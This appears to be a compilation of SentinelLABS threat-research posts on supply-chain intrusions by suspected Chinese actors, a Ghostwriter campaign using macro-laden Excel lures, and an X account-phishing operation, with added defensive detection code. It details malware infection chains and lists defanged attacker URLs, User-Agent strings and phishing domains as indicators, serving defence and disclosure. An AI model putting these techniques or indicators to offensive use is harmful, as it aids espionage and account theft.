One of the most impactful lessons from tracking adversaries targeting our platform has been the value of deep, early collaboration across internal teams — particularly those not traditionally pulled into threat response efforts. For example, by proactively engaging with our reseller operations and customer success teams, we can surface valuable signals on questionable license requests, reseller behavior anomalies, and business inconsistencies that could have otherwise gone unnoticed.
By creating shared playbooks, embedding lightweight threat context, and establishing clear escalation paths, reactive processes turn into proactive signal sources. Now, suspicious licensing activity—especially when paired with evasive behaviors or mismatched domain metadata—can surface much earlier in the workflow.
To scale this effort, we increasingly lean into automation. By codifying threat patterns—such as domain registration heuristics, behavioral metadata mismatches, and reseller inconsistencies—organizations can automate enrichment and risk-scoring for incoming licensing requests. This can then be used to dynamically filter, flag, and in some cases, auto-block high-risk activity before it reaches onboarding.
The growing trend of adversaries exploiting sales processes—whether through impersonation, social engineering, or brute-force credential use—means security vendors must treat every access vector, including commercial and operational pipelines, as part of the attack surface. Making cross-functional threat awareness standard operating procedure and integrating detection logic at the edge of business systems is essential.
We’re continuing to improve this work in quiet ways. And while we won’t share every detection logic here (for obvious reasons), we encourage others in the industry to pursue similar internal partnerships. Sales and support teams may already be seeing signs of abuse—security teams just need to give them the lens to recognize it.
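A minimal version of the risk scoring described in this section, added here as an example and not SentinelOne's own detection logic. The customer list, requests, weights and threshold are constructed; the domain registration date and reseller order history are assumed to come from RDAP/WHOIS and CRM enrichment.

```python
"""Risk scoring for inbound license requests: lookalike domains, fresh registrations,
free-mail contacts and unvetted resellers.

Added example, not SentinelOne's own logic. Requests, thresholds and the
"known customers" list are constructed; `domain_registered` and
`reseller_prior_orders` are assumed to be filled in by RDAP/WHOIS and CRM enrichment.
"""
from dataclasses import dataclass
from datetime import date

# Constructed: domains of organisations already vetted as real customers.
KNOWN_CUSTOMER_DOMAINS = {"acme-industries.example", "globex.example"}
FREE_MAIL_DOMAINS = {"gmail.com", "outlook.com", "protonmail.com", "hotmail.com"}


@dataclass
class LicenseRequest:
    claimed_company: str
    contact_email: str
    company_domain: str
    domain_registered: date      # assumed: from RDAP/WHOIS enrichment
    reseller: str
    reseller_prior_orders: int   # assumed: from the reseller CRM
    request_date: date


def edit_distance(a, b):
    """Plain Levenshtein distance; enough to catch one- or two-character lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain, known):
    """Return the known domain this one imitates (distance 1-2), or None."""
    for k in known:
        if 1 <= edit_distance(domain, k) <= 2:
            return k
    return None


def score_request(req, known=KNOWN_CUSTOMER_DOMAINS, new_domain_days=30):
    """Return (score, reasons). Weights are constructed; tune them to your false-positive budget."""
    reasons = []
    target = lookalike_of(req.company_domain, known)
    if target:
        reasons.append(("lookalike_domain", 3, f"{req.company_domain} resembles {target}"))
    age = (req.request_date - req.domain_registered).days
    if age < new_domain_days:
        reasons.append(("newly_registered_domain", 2, f"registered {age} days before request"))
    mail_domain = req.contact_email.rsplit("@", 1)[-1].lower()
    if mail_domain != req.company_domain and mail_domain in FREE_MAIL_DOMAINS:
        reasons.append(("free_mail_contact", 2, f"contact uses {mail_domain}"))
    if req.reseller_prior_orders == 0:
        reasons.append(("unvetted_reseller", 1, f"first order via {req.reseller}"))
    return sum(w for _, w, _ in reasons), reasons


def triage(req):
    """Route the request before onboarding sees it."""
    score, _ = score_request(req)
    return "hold for review" if score >= 5 else "proceed"


# Constructed requests: one impersonation attempt, one ordinary renewal.
SUSPICIOUS = LicenseRequest(
    claimed_company="Acme Industries",
    contact_email="procurement@acme-industrles.example",   # 'i' swapped for 'l'
    company_domain="acme-industrles.example",
    domain_registered=date(2025, 3, 1),
    reseller="tiny-reseller.example",
    reseller_prior_orders=0,
    request_date=date(2025, 3, 11),
)
LEGITIMATE = LicenseRequest(
    claimed_company="Acme Industries",
    contact_email="it@acme-industries.example",
    company_domain="acme-industries.example",
    domain_registered=date(2015, 6, 1),
    reseller="established-var.example",
    reseller_prior_orders=40,
    request_date=date(2025, 3, 11),
)

if __name__ == "__main__":
    for r in (SUSPICIOUS, LEGITIMATE):
        print(r.company_domain, score_request(r), triage(r))
```

The reasons list is what the reseller operations or customer success analyst sees, so each entry carries a human-readable explanation rather than just a weight; that is what makes the escalation path usable by people outside the security team.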
Chinese State-Sponsored Adversaries
One notable set of activity, occurring over the previous months, involved reconnaissance attempts against SentinelOne’s infrastructure and specific high value organizations we defend. We first became aware of this threat cluster during a 2024 intrusion conducted against an organization previously providing hardware logistics services for SentinelOne employees. We refer to this cluster of activity as PurpleHaze, with technical overlaps to multiple publicly reported Chinese APTs.
The PurpleHaze Activity Cluster
Over the course of months, SentinelLABS observed the threat actor conduct many intrusions, including into a South Asian government-supporting entity that provides IT solutions and infrastructure across multiple sectors. This activity involved extensive infrastructure, some of which we associate with an operational relay box (ORB) network, and a Windows backdoor that we track as GoReShell. The backdoor is implemented in the Go programming language and uses functionality from the open-source reverse_ssh tool to establish reverse SSH connections to attacker-controlled endpoints.
SentinelLABS collectively tracks these activities under the PurpleHaze moniker. We assess with high confidence that PurpleHaze is a China-nexus actor, loosely linking it to APT15 (also known as Nylon Typhoon, among various other outdated aliases). This adversary is known for its global targeting of critical infrastructure sectors, such as telecommunications, information technology, and government organizations – victimology that aligns with our multiple encounters with PurpleHaze.
We track the ORB network infrastructure observed in the attack against the South Asian government organization as being operated from China and actively used by several suspected Chinese cyberespionage actors, including APT15. The use of ORB networks is a growing trend among these threat groups, since they can be rapidly expanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their attribution challenging. Additionally, GoReShell malware and its variations, including the deployment mechanism on compromised machines and obfuscation techniques have been exclusively observed in intrusions that we attribute with high confidence to China-nexus actors.
ShadowPad Intrusions
In June 2024, approximately four months prior to PurpleHaze targeting SentinelOne, SentinelLABS observed threat actor activity targeting the same South Asian government entity that was also targeted in October 2024. Among the retrieved artifacts, we identified samples of ShadowPad, a modular backdoor platform used by multiple suspected China-nexus threat actors to conduct cyberespionage. Recent ShadowPad activity has also included the deployment of ransomware, though the motive remains unclear — whether for financial gain or as a means of distraction, misattribution, or removal of evidence.
The ShadowPad samples we retrieved were obfuscated using ScatterBrain, an evolution of the ScatterBee obfuscation mechanism. Our industry partner, Google Threat Intelligence Group (GTIG), has also observed the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attributes them to clusters associated with the suspected Chinese APT actor, APT41.
GTIG APT41 Use of ScatterBrain
Investigations continue in determining the specific actor overlap between June 2024 ShadowPad intrusions and the later PurpleHaze activity. We do not rule out the involvement of the same threat cluster, particularly given the extensive sharing of malware, infrastructure, and operational practices among Chinese threat groups, as well as the possibility of access transfer between different actors.
Based on private telemetry, we identified a large collection of victim organizations compromised using ScatterBrain-obfuscated ShadowPad. Between July 2024 and March 2025, this malware was used in intrusions at over 70 organizations across various regions globally, spanning sectors such as manufacturing, government, finance, telecommunications, and research. We assess that the threat actor primarily gained an initial foothold in the majority of these organizations by exploiting an n-day vulnerability in Check Point gateway devices, which aligns with previous research on ShadowPad intrusions involving the deployment of ransomware.
Among the victims, we identified the previously mentioned IT services and logistics organization that was at the time responsible for managing hardware logistics for SentinelOne employees. Victim organizations were promptly informed of intrusion specifics, which were swiftly investigated. At this point, it remains unclear whether the perpetrators’ focus was solely on the compromised organization or if they intended to extend their reach to client organizations as well.
A detailed investigation into SentinelOne’s infrastructure, software, and hardware assets found no evidence of secondary compromise. Nevertheless, this case underscores the fragility of the larger supplier ecosystem that organizations depend upon and the persistent threat posed by suspected Chinese threat actors, who continuously seek to establish strategic footholds to potentially compromise downstream entities.
SentinelLABS will share a detailed public release on this topic in due course, providing further technical information on these activities, including observed TTPs, malware, and infrastructure.
Lessons Learned While Hardening Our Operational Ecosystem
Our analysis of the PurpleHaze cluster, and more specifically the potential indirect risk introduced via compromised third-party service providers, has reinforced several key insights around operational security and supply chain monitoring. Even when our own infrastructure remained untouched, the targeting of an external service provider previously associated with business logistics surfaced important considerations.
One immediate reminder is the necessity of maintaining real-time awareness not only over internal assets but also over adjacent service providers—particularly those with past or current access to sensitive employee devices or logistical information. When incidents occur near your supply chain, don’t wait for confirmation of compromise. Proactively trigger internal reviews of asset inventories, procurement workflows, OS images and onboarding deployment scripts, and segmentation policies to quickly identify any exposure pathways and reduce downstream risk.
This leads to several defense recommendations:
Distribute Threat Intelligence Across Operational Stakeholders
Organizations should proactively share campaign-level threat intelligence with business units beyond the traditional security org—particularly those managing vendor relationships, logistics, and physical operations. Doing so enables faster detection of overlap with compromised third parties and supports early reassessment of exposure through external partners.
Integrate Threat Context Into Asset Attribution Workflows
Infrastructure and IT teams should collaborate with threat intelligence functions to embed threat-aware metadata into asset inventories. This enables more responsive scoping during incident response and enhances the ability to trace supply chain touchpoints that may be at risk.
Expand Supply Chain Threat Modeling
Organizations should refine their threat modeling processes to explicitly account for upstream supply chain threats, especially those posed by nation-state actors with a history of leveraging contractors, vendors, or logistics partners as indirect access vectors. Tailoring models to include adversary-specific tradecraft enables earlier identification of unconventional intrusion pathways.
While attribution continues to evolve and victim impact remains diverse, one thing is clear: well-resourced threat actors are increasingly leaning on indirect routes into enterprise environments. Investigations like this help us sharpen our defenses—not just around traditional digital perimeters but around the full operational footprint of our organization.
The Strategic Value of Cyber Threat Intelligence
In today’s threat landscape, threat intelligence has evolved from a niche function into an essential pillar of enterprise defense—particularly for private sector organizations operating in the security space. As threat actors increasingly target security vendors for insider access, abuse of legitimate channels, and supply chain infiltration, the role of CTI in anticipating and disrupting these tactics has become more critical than ever.
One of the most tangible examples of this value is in internal talent acquisition and insider threat defense. Intelligence has become a frontline asset in identifying attempts by North Korean IT workers and other state-backed operatives to embed themselves in organizations under false pretenses. By flagging suspicious applicant patterns, cross-referencing alias histories, and tracking known tradecraft, CTI teams help hiring managers and HR avoid potential insider incidents before they start.
Our CTI capabilities must also directly support sales and channel operations. As criminal groups increasingly impersonate legitimate businesses to acquire security products through trusted resellers, intelligence plays a key role in verifying customer legitimacy and identifying anomalous purchase behaviors. By integrating intelligence insights into pre-sale vetting workflows, a crucial layer of protection is helping to ensure adversaries cannot simply “buy” their way into our technology stack.
Internally, threat intelligence informs and enhances how we defend our own technology and supply chain against highly targeted APT activity. From understanding how adversaries reverse-engineer our software to uncovering which parts of our technology stack they seek to compromise, CTI enables proactive hardening, smarter telemetry prioritization, and meaningful collaboration with product and engineering teams. In essence, intelligence acts as an early-warning system and a strategic guide—ensuring our defenses stay one step ahead of evolving threats.
Across every function—whether it’s HR, Sales, Engineering, or Security—cyber threat intelligence is no longer a backroom function. It’s embedded in the fabric of how we defend, operate, and grow as a business.
SentinelLABS has observed a campaign targeting opposition activists in Belarus as well as Ukrainian military and government organizations.
The campaign has been in preparation since July-August 2024 and entered the active phase in November-December 2024.
Recent malware samples and command-and-control (C2) infrastructure activity indicate that the operation remains active in recent days.
SentinelLABS assesses that this cluster of threat activity is an extension of the long-running Ghostwriter campaign identified in previous public reporting.
Ghostwriter | Background
Ghostwriter is a long-running campaign likely active since 2016 and subsequently described in various public reports throughout 2020 to 2024. The actor behind Ghostwriter campaigns is closely linked with Belarusian government espionage efforts, while most commonly reported under the APT names UNC1151 (Mandiant) or UAC-0057 (CERT-UA). Some public reports may use the term “Ghostwriter APT” interchangeably to refer to both the threat actor and its associated campaigns.
Previous research on the evolution of Ghostwriter noted how it operated successfully across a range of platforms, blending information manipulation with hacking to target a number of European countries. Reporting throughout 2022 to 2024 described activity in which malicious Excel documents were used to deliver PicassoLoader and Cobalt Strike payloads. Observed document lures were themed around issues pertaining to the Ukraine military and the likely targeting of the Ministry of Defense.
SentinelLABS has observed new activity with multiple weaponized Excel documents containing lures pertaining to the interests of the Ukraine government, the Ukraine military and domestic Belarusian opposition. While some of the TTPs we have observed overlap with previous reporting, others are new, including adaptations of previously observed payloads such as PicassoLoader.
Weaponized XLS 1 | “Political Prisoners in Minsk Courts”
SentinelLABS analyzed an attack that started with a Google Drive shared document landing in the target’s inbox. The email originated from an account using the name “Vladimir Nikiforech” (vladimir.nikiforeach@gmail[.]com). The email link pointed to a downloadable RAR archive, which according to the internal timestamps was created on 2025-01-14 00:47:54, containing a malicious Excel workbook (ebb30fd99c2e6cbae392c337df5876759e53730d) with the file name политзаключенные(по судам минска).xls (“Political prisoners (across courts of Minsk).xls”).
The title of the lure indicates an interesting shift in Ghostwriter targeting. Although attribution for the 2021 Ghostwriter campaign pointed to the Belarus state, this is the first time we have seen lures directly aimed at Belarus government opposition. The timing of the attack could have been motivated by the presidential election that took place shortly after on Jan 26, 2025.
The XLS document contains an obfuscated VBA macro which is activated when the document is opened and the user allows Office macros to run.
Obfuscated macro inside the XLS spreadsheet
On execution, the macro writes a file to %Temp%\Realtek(r)Audio.dll.
The DLL file is loaded with the following command line invocation:
This starts the standard Windows process regsvr32.exe, which calls the DllUnregisterServer function implemented inside the DLL; the function then loads and executes the .NET assembly described next.
Analysis of Dwnldr.dll shows that it is a DLL file with a .NET assembly embedded inside. The file is protected with ConfuserEx – a publicly available tool that helps to obfuscate .NET programs and observed in previous Ghostwriter campaigns.
The DLL file hosts a payload that appears to be a simplified variant of PicassoDownloader, a malware family also linked to Ghostwriter activity. The internal filename (Dwnldr.dll) was previously used by the Ghostwriter threat actor; however, this variant bears only high-level similarities to previous versions, with significant changes to the underlying code, possibly to make it a cheaper and more expendable tool.
As a part of application protection provided by the obfuscator, the Downloader creates a copy of itself in memory, and then modifies it. It does so by decrypting additional code of the assembly. It also uses a clever evasion technique, altering its own PE header in memory and breaking internal links to the .NET assembly. This makes it impossible for security products to parse it as a .NET module.
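One way such tampering can be caught from the defender's side is to check whether a dumped image still carries .NET metadata while its PE header no longer points at a CLR runtime header. The check below is an added example, not code from the report; the minimal PE32 image it builds is constructed purely to exercise the check, and a zeroed CLR data directory is only one of the ways the link can be broken.

```python
import struct

CLR_DIRECTORY_INDEX = 14      # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR in the PE data directory
METADATA_SIGNATURE = b"BSJB"  # magic at the start of every .NET metadata root


def clr_directory(image: bytes):
    """Return (rva, size) of the CLR runtime header entry, (0, 0) if the directory
    table has been truncated below index 14, or None if no PE header parses."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt_hdr = e_lfanew + 4 + 20  # skip the PE signature and IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", image, opt_hdr)[0]
    if magic == 0x10B:          # PE32
        num_dirs_off, dirs_off = opt_hdr + 92, opt_hdr + 96
    elif magic == 0x20B:        # PE32+
        num_dirs_off, dirs_off = opt_hdr + 108, opt_hdr + 112
    else:
        return None
    num_dirs = struct.unpack_from("<I", image, num_dirs_off)[0]
    if num_dirs <= CLR_DIRECTORY_INDEX:
        return (0, 0)
    return struct.unpack_from("<II", image, dirs_off + CLR_DIRECTORY_INDEX * 8)


def looks_like_unlinked_dotnet(image: bytes) -> bool:
    """True when .NET metadata is present in the buffer but the PE header no
    longer points at a CLR runtime header, i.e. the internal link is broken."""
    if METADATA_SIGNATURE not in image:
        return False
    entry = clr_directory(image)
    if entry is None:
        return True   # metadata present but the header itself no longer parses
    rva, size = entry
    return rva == 0 or size == 0


def build_synthetic_pe32(clr_rva: int, clr_size: int, with_metadata: bool = True) -> bytes:
    """Constructed test image, not a real binary: just enough PE32 header for the check."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: NT headers follow the DOS header
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (224 for PE32), Characteristics.
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)   # PE32 magic
    struct.pack_into("<I", opt, 92, 16)     # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + CLR_DIRECTORY_INDEX * 8, clr_rva, clr_size)
    payload = METADATA_SIGNATURE + b"\x01\x00\x01\x00" if with_metadata else b"\0" * 8
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + b"\0" * 64 + payload + b"\0" * 64


if __name__ == "__main__":
    intact = build_synthetic_pe32(0x2008, 72)
    tampered = build_synthetic_pe32(0, 0)
    native = build_synthetic_pe32(0, 0, with_metadata=False)
    print("intact .NET image flagged:", looks_like_unlinked_dotnet(intact))       # False
    print("header-tampered image flagged:", looks_like_unlinked_dotnet(tampered))  # True
    print("native image flagged:", looks_like_unlinked_dotnet(native))            # False
```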
During code execution, after the protection layer passes control to core functionality, the Downloader writes a decoy Excel workbook file to %AppData%\Roaming\Microsoft\temp.xlsx and downloads additional file(s) from the Web.
The temp.xlsx decoy file (18151b3801bd716b5a33cfc85dbdc4ba84a00314) is immediately opened in Excel in an attempt to make the victim believe that it contains the original content of the политзаключенные (по судам минска).xls file.
Decoy document containing lists of people with criminal charges, prosecutors’ and judges’ names
The spreadsheet contains the names of people with criminal charges along with the names of prosecutors and judges: content that invites the reader to believe it could be leaked from a government source. However, the information was already in the public domain and can be found on the website of a proscribed Belarusian human rights organization, Spring96.
Once the decoy Excel file is opened, the Downloader attempts to fetch the next stage from the following URL:
We note that the .shop top level domain was also reported in other Ghostwriter activity seen in 2024.
When the malware issues the HTTP request, it uses a hardcoded User-Agent string:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/555.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
The fetched file (8d2bb96e69df059f279d97989690ce3e556a8318) is a benign JPEG file, originating from publicly available photo stock, with no extra payload or any hidden cave where code could be embedded. We confirmed that an identical file can be found online, located on a web site that is nearly identical to the one used by attackers. It would seem the attackers not only reused the JPG file contents from a legitimate website but also copied its original URL, changing only the top level domain:
This Registry entry makes rundll32.exe load the DLL and execute its exported function with ordinal 1 whenever a user logs on.
Overview of the malware stages for Weaponized XLS 1
During our analysis we only observed the benign JPG file being downloaded. However, based on the code analysis, we believe that the real targets receive an actual DLL. We assume that such a targeted payload delivery process is carefully controlled by the attackers and that they deliver the payload only after confirming the requesting client’s profile (browser user agent, IP address of the client, and matching time of the operation window). Research in a previous campaign found that a Cobalt Strike payload was delivered to targets only if the host IP was located in Ukraine.
Given the timing and targeting of the attack, we hypothesized that it may not have been an isolated incident. Further research led us to discover other samples closely resembling Weaponized XLS 1, suggesting that multiple attacks using the same techniques had been planned or executed. The samples used in these suspected attacks are described below.
A file bearing the Ukrainian name Zrazok.xls (“Sample.xls”) is an XLS file (301ffdf0c7b67e01fd2119c321e7ae09b7835afc) with an obfuscated VBA macro embedded. However, the script code and obfuscation technique are different from the case we discussed earlier.
For this script, the attackers used a popular obfuscator tool called Macropack, an open-source but seemingly abandoned project originally developed for red-teaming and penetration testing exercises.
Macropack-obfuscated VBA macro found inside the spreadsheet
As in the previous case, once the macro code is executed, the .NET ConfuserEx-obfuscated Downloader DLL (written to %AppData%\Roaming\Microsoft\bruhdll32.dll) is loaded with rundll32.exe and the respective command line arguments to run an exported function. After this, the new module drops a decoy XLS file and opens it with Excel.
The decoy document prepared for a Ukrainian reader (an action plan for an anti-corruption initiative in government organisations in Ukraine)
This module attempts to download the next stage from the following URL (unavailable at the time of writing):
Again, the file name and the path on the malicious server were nearly identical to the legitimate one, with the actor changing only the top level domain from .com to .shop.
In this case, the downloaded file is expected to be an archive in a GZIP format. Once downloaded, the malware decompresses it and saves it to the following location:
This suggests that the CertificateCenter.dll file is not a binary as the file extension would suggest but rather contains program source code. The command, if successful, produces an executable file in the following location:
and likely contains the next stage of the infection chain.
Overview of the malware stages for Weaponized XLS 2
Weaponized XLS 3 | “Supplies for Ukraine Armed Forces”
A file bearing the Ukrainian name Донесення 5 реч - зразок.xls (“Report 5 items – sample.xls”) is an XLS file (9d110879d101bcaec7accc3001295a53dc33371f) hosting another VBA payload obfuscated with Macropack.
As in the previous cases, once the macro code is executed, the .NET ConfuserEx-obfuscated Downloader DLL (written to %AppData%\Roaming\Microsoft\bruhdll32.dll) is loaded with rundll32.exe and the respective command line arguments to run an exported function. After this, the new module drops a decoy XLS file on disk and opens it with Excel.
The decoy document prepared for a Ukrainian reader (a report template for the Ukrainian armed forces supplies)
Again, the malware uses the same payload retrieval technique and downloads a JPG file from yet another .shop domain:
https://cookingwithbooks[.]shop/images/qwerty.jpg
The URL is unavailable at the time of writing, but data from VirusTotal indicates that the downloaded file is identical to the black hole image described above in the Weaponized XLS 2 section. The malware logic is also identical with Weaponized XLS 2.
Weaponized XLS 4 & 5 | Variations on a Theme
In addition to the previous findings, we discovered further related XLS files that were similarly weaponized. The files Донесення 5 реч фонд зборів- зразок.xls (“Report 5 items collection fund- sample.xls”; 2c06c01f9261fe80b627695a0ed746aa8f1f3744) and Додаток 8 реч новий.xls (“Addition 8 items new – sample.xls”; 853da593d2a489c2bd72a284a362d7c68c3a4d4c) were first uploaded from Ukraine in Feb 2025.
Both files contain a Macropack-obfuscated VBA macro; however, they differ in structure. Functionally, both drop a DLL to the previously noted path %AppData%\Roaming\Microsoft\bruhdll32.dll.
Again, the DLL is loaded with rundll32.exe and respective command line arguments to execute an exported function. Next, the victim sees a decoy workbook open in Excel.
The decoy documents prepared for a Ukrainian reader (a report template for the Ukrainian armed forces supplies)
The decoys are similar and the obfuscation technique, code structure, and the embedded URL are common to both:
The User-Agent string in the HTTP request, however, is different, with the operating system and architecture specified as “Windows NT 10.0; Win64; x64”.
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71
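The two hardcoded User-Agent strings (this one and the Macintosh string from Weaponized XLS 1) and the .shop image-URL pattern used across the samples give defenders something concrete to hunt for in proxy logs. The detection below is an added example, not code from the report: the log format, client addresses and all hosts other than the cookingwithbooks[.]shop URL quoted above are constructed.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

# The two User-Agent strings the report quotes as hardcoded in the downloader.
GHOSTWRITER_USER_AGENTS = {
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/555.36 "
    "(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71",
}
SHOP_TLD_RE = re.compile(r"\.shop$", re.IGNORECASE)
IMAGE_PATH_RE = re.compile(r"\.(jpe?g|png|gif)$", re.IGNORECASE)

# Constructed proxy log layout: <timestamp> <client-ip> <method> <url> "<user-agent>"
LOG_LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


@dataclass(frozen=True)
class Finding:
    client: str
    url: str
    reasons: tuple[str, ...]


def analyse_line(line: str) -> Finding | None:
    """Return a Finding for one proxy log line, or None if nothing matches."""
    m = LOG_LINE_RE.match(line.strip())
    if not m:
        return None
    _ts, client, _method, url, ua = m.groups()
    reasons: list[str] = []

    if ua in GHOSTWRITER_USER_AGENTS:
        reasons.append("User-Agent matches a string hardcoded in the Ghostwriter downloader")
    # Chromium-based browsers have reported the frozen token AppleWebKit/537.36 for
    # years; a 555.36 build does not exist, so the token is a signal on its own.
    if "AppleWebKit/555.36" in ua:
        reasons.append("impossible AppleWebKit build token in User-Agent")

    parsed = urlparse(url)
    host = parsed.hostname or ""
    if SHOP_TLD_RE.search(host) and IMAGE_PATH_RE.search(parsed.path):
        reasons.append("image fetched from a .shop domain (pattern used to mirror legitimate .com URLs)")

    return Finding(client, url, tuple(reasons)) if reasons else None


def analyse_log(lines) -> list[Finding]:
    """Run analyse_line over an iterable of log lines and keep the hits."""
    return [f for f in (analyse_line(entry) for entry in lines) if f is not None]


# Constructed sample traffic. Only the second line reuses a URL quoted in the report;
# the other hosts, client addresses and timestamps are made up for this example.
SAMPLE_LOG = [
    '2025-01-15T09:58:01Z 10.10.4.21 GET https://www.example.com/index.html '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"',
    '2025-01-15T10:01:02Z 10.10.4.37 GET https://cookingwithbooks.shop/images/qwerty.jpg '
    '"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/555.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"',
    '2025-01-15T10:03:44Z 10.10.4.52 GET https://another-example.shop/images/banner.jpg '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71"',
    '2025-01-15T10:05:10Z 10.10.4.21 GET https://shop.example.com/images/logo.png '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"',
]


if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(f"{finding.client} -> {finding.url}")
        for reason in finding.reasons:
            print("   ", reason)
```

The fourth sample line shows why the TLD test is applied to the hostname rather than the whole URL: a legitimate host such as shop.example.com must not trip it.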
These variants of the malware also contain another embedded .NET DLL, internally referred to as LibCMD from the original filename LibCMD.dll (4ae6b8adc980ba8a212b838f3ca6a9718d9a3757). This is a small file, whose purpose is simply to start cmd.exe and connect to stdin/stdout.
The file contains a tampered PE link timestamp. It is never saved to disk; instead, it is loaded dynamically in memory as a .NET assembly and executed.
Overview of the malware stages for Weaponized XLS 4 & 5
Attribution
Analysis of techniques used by threat actors can often be helpful in establishing the origin of the attack and the malware it uses. In this case, the obfuscation techniques are quite specific across all the samples we analyzed, allowing us to establish a medium confidence link between them and a malware cluster known as PicassoLoader, a downloader toolkit.
PicassoLoader has been used in cyber attacks targeting government, military, and civilian entities in Ukraine and Poland and is exclusively associated with the Ghostwriter threat actor (aka UNC1151, UAC-0057, Blue Dev 4, Moonscape, TA445).
Throughout 2024, Ghostwriter has repeatedly used a combination of Excel workbooks containing Macropack-obfuscated VBA macros and dropped embedded .NET downloaders obfuscated with ConfuserEx. In our case, the Downloader malware appears to be a simplified implementation of the PicassoLoader.
Conclusion
The Ghostwriter threat actor has been consistently active in the past years and continues its attempts to compromise targets aligned with the interests of Belarus and its closest ally, Russia. It has mounted multiple attacks reported by CERT UA and other security researchers throughout 2024.
While Belarus doesn’t actively participate in military campaigns in the war in Ukraine, cyber threat actors associated with it appear to have no reservation about conducting cyberespionage operations against Ukrainian targets.
The campaign described in this publication also serves as confirmation that Ghostwriter is closely tied with the interests of the Belarusian government waging an aggressive pursuit of its opposition and organizations associated with it.
We would like to express our thanks to partners in the region, including RESIDENT.NGO and others who remain unnamed, for their invaluable collaboration.
Organizations that believe they may have been targeted by threat actors involved in this campaign are invited to reach out to the SentinelLABS team via ThreatTips@sentinelone.com.
An active phishing campaign is targeting high-profile X accounts in an attempt to hijack and exploit them for fraudulent activity.
This campaign has been observed targeting a variety of individual and organization accounts such as U.S. political figures, leading international journalists, an X employee, large technology organizations, cryptocurrency organizations, and owners of valuable, short usernames.
SentinelLABS’ analysis links this activity to a similar operation from last year that successfully compromised multiple accounts to spread scam content with financial objectives. While the activity detailed here is centered around X/Twitter accounts, this actor is not limited to a single social platform, and can be observed directing attention to other popular services as well, while seemingly pursuing the same financial objectives.
If you’ve encountered similar suspicious activity, SentinelLABS would love to hear from you — please reach out to the team at ThreatTips@sentinelone.com.
Account Compromise Process
Thanks to tips from targets and collaboration with industry partners, SentinelLABS has observed a variety of phishing lures tied to this campaign over the past few weeks. One example is the classic account login notice. The links in the email received by the target are not legitimate and lead to credential phishing sites. Other observed lures use copyright violation themes. However, SentinelLABS notes that directly phishing users may not be the only access method employed by this attacker.
An X ‘new login’-themed phishing email
In recent cases, we observed the actor abusing Google’s “AMP Cache” domain cdn.ampproject[.]org to evade email detections and redirect the user to a phishing domain:
This ultimately leads the targets to an actor-made phishing website seeking X account credentials:
X credential phishing page
In the copyright infringement lure scenario, the user will first visit an Action Needed page before being prompted to enter credentials:
X fake copyright infringement page
Once an account is taken over, the attacker swiftly locks out the legitimate owner and begins posting fraudulent cryptocurrency opportunities or links to external sites designed to lure additional targets, often with a crypto theft-related theme. Ultimately, compromising high-profile accounts enables the attacker to reach a broader audience of potential secondary victims, maximizing their financial gains.
Widespread Activity
In recent activity associated with this campaign, the domain securelogins-x[.]com has been used to deliver emails and x-recoverysupport[.]com to host phishing pages. Our observations indicate a level of informality and flexibility of infrastructure use – meaning any of these domains can be considered email delivery or phishing page hosting.
An overall collection of recent activity can be observed hosted on 84.38.130[.]20, an IP associated with a Belize-based VPS service called Dataclub. The domains themselves have been predominantly registered through Turkish hosting provider Turkticaret.
Inspecting the DNS history of 84.38.130[.]20 leads to a variety of interestingly related domains. As shown below, the cluster of activity began in mid-2024 and continues today. While this is only one phishing page hosting IP, it provides a good perspective of the length of this activity and its ability to avoid much attention for over a year.
Validin Infrastructure Analysis Timeline
Our observations suggest that the attacker is highly adaptable, continuously exploring new techniques while maintaining a clear financial motive. The targeting appears constrained, yet opportunistic. Notably, past public reports have attributed related activity to Turkish-speaking actors based on the language of the comments in the phishing pages' source code. At this time, we do not attribute this campaign to a specific country or any widely-tracked threat actor.
Some of the malicious sites and content hosted across 84.38.130[.]20 are built using the FASTPANEL DIRECT service.
FASTPANEL landing page on buy-tanai[.]com
